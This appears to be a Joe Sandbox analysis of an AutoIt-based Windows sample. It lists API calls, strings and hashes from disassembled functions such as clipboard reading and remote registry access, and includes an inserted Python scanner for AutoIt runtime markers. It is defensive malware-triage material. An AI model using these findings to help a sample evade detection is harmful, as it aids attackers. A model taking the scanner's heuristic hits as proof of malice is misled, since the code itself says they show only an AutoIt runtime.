                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                • DeleteObject.GDI32(?), ref: 00459551
                                                                                                • DestroyWindow.USER32(?), ref: 00459563
                                                                                                • GetDesktopWindow.USER32 ref: 00459581
                                                                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                • _wcslen.LIBCMT ref: 00459916
                                                                                                • _wcscpy.LIBCMT ref: 0045993A
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                • GetDC.USER32(00000000), ref: 004599FC
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                • API String ID: 4040870279-2373415609
                                                                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                APIs
                                                                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                • String ID:
                                                                                                • API String ID: 69173610-0
                                                                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                • API String ID: 2910397461-517079104
                                                                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                • API String ID: 1038674560-3360698832
                                                                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
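The record above (API ID `__wcsnicmp`, string IDs `#NoAutoIt3Execute`, `#OnAutoItStartRegister`, `#include`, `Cannot parse #include`, ...) together with the `CreateWindowExW(..., AutoIt v3, ...)` and `msctls_progress32` calls in the preceding record are the AutoIt v3 runtime's script-directive parser and splash window, i.e. the sample carries an AutoIt-compiled runtime. As an added triage example, not Joe Sandbox code and not code from the sample, the following Python scanner flags a file that carries several of these runtime strings. The indicator list is taken from this report's records; searching both ASCII and UTF-16LE is an assumption drawn from the wide-char APIs (`CreateWindowExW`, `__wcsnicmp`) that consume the strings, and the sample blob is constructed, not bytes from jpdy1E8K4A.exe.

```python
"""Triage helper: flag a blob that carries AutoIt v3 runtime strings.

Added example for this report; it is not Joe Sandbox code and it does not
extract or parse the embedded AutoIt script. The indicator list comes from
the string IDs and API arguments shown in the disassembly records above.
Looking for UTF-16LE as well as ASCII is an assumption based on the wide-char
APIs (CreateWindowExW, __wcsnicmp) that consume these strings.
"""
from __future__ import annotations

# Indicators visible in this report's function records.
AUTOIT_INDICATORS = (
    "AutoIt v3",                        # CreateWindowExW window title
    "#NoAutoIt3Execute",                # directives parsed by the __wcsnicmp routine
    "#OnAutoItStartRegister",
    "#notrayicon",
    "#requireadmin",
    "#include-once",
    "Cannot parse #include",            # parser error strings in the same routine
    "Unterminated group of comments",
    "msctls_progress32",                # progress control of the runtime's splash window
)


def _encodings(s: str) -> dict[str, bytes]:
    """Both byte forms a Windows binary may store a literal in (assumption: see module docstring)."""
    return {"ascii": s.encode("ascii"), "utf-16le": s.encode("utf-16-le")}


def scan_autoit_markers(data: bytes) -> dict[str, list[str]]:
    """Return {indicator: [encodings found]} for every indicator present in data.

    Matching is exact-case: the directives are stored literally in the runtime
    (it is the runtime that compares case-insensitively, via __wcsnicmp, when
    it parses a script).
    """
    hits: dict[str, list[str]] = {}
    for indicator in AUTOIT_INDICATORS:
        found = [enc for enc, needle in _encodings(indicator).items() if needle in data]
        if found:
            hits[indicator] = found
    return hits


def is_probably_autoit(data: bytes, min_hits: int = 3) -> bool:
    """Require several independent markers so a lone 'AutoIt v3' string in a
    benign file (documentation, an installer's EULA) does not trip the check."""
    return len(scan_autoit_markers(data)) >= min_hits


# Constructed sample blob: a few UTF-16LE strings, one ASCII string and filler.
# These are NOT bytes taken from the analysed sample.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 64
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "#NoAutoIt3Execute".encode("utf-16-le") + b"\x00\x00"
    + "msctls_progress32".encode("utf-16-le") + b"\x00\x00"
    + b"Cannot parse #include\x00"
    + b"\x90" * 32
)

if __name__ == "__main__":
    for indicator, encs in scan_autoit_markers(SAMPLE_BLOB).items():
        print(f"{indicator!r}: {', '.join(encs)}")
    print("AutoIt runtime markers present:", is_probably_autoit(SAMPLE_BLOB))
```

Run it against a file with `scan_autoit_markers(open(path, "rb").read())`; a grep for the ASCII text alone misses the wide-char copies, which is the reason both encodings are tried. A positive result says only that an AutoIt runtime is present, not what the embedded script does; that still has to come from the dynamic behaviour recorded elsewhere in this report.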
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                • SetCursor.USER32(00000000), ref: 00430773
                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                • SetCursor.USER32(00000000), ref: 00430803
                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                • SetCursor.USER32(00000000), ref: 00430833
                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                • SetCursor.USER32(00000000), ref: 00430863
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                • SetCursor.USER32(00000000), ref: 00430887
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cursor$Load
                                                                                                • String ID:
                                                                                                • API String ID: 1675784387-0
                                                                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                APIs
                                                                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                • String ID:
                                                                                                • API String ID: 1582027408-0
                                                                                                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                APIs
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                Similarity
                                                                                                • API ID: CloseConnectCreateRegistry
                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                • API String ID: 3217815495-966354055
                                                                                                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                • DestroyWindow.USER32(?), ref: 00456746
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                • String ID: ($,$tooltips_class32
                                                                                                • API String ID: 225202481-3320066284
                                                                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                APIs
                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                • String ID:
                                                                                                • API String ID: 15083398-0
                                                                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
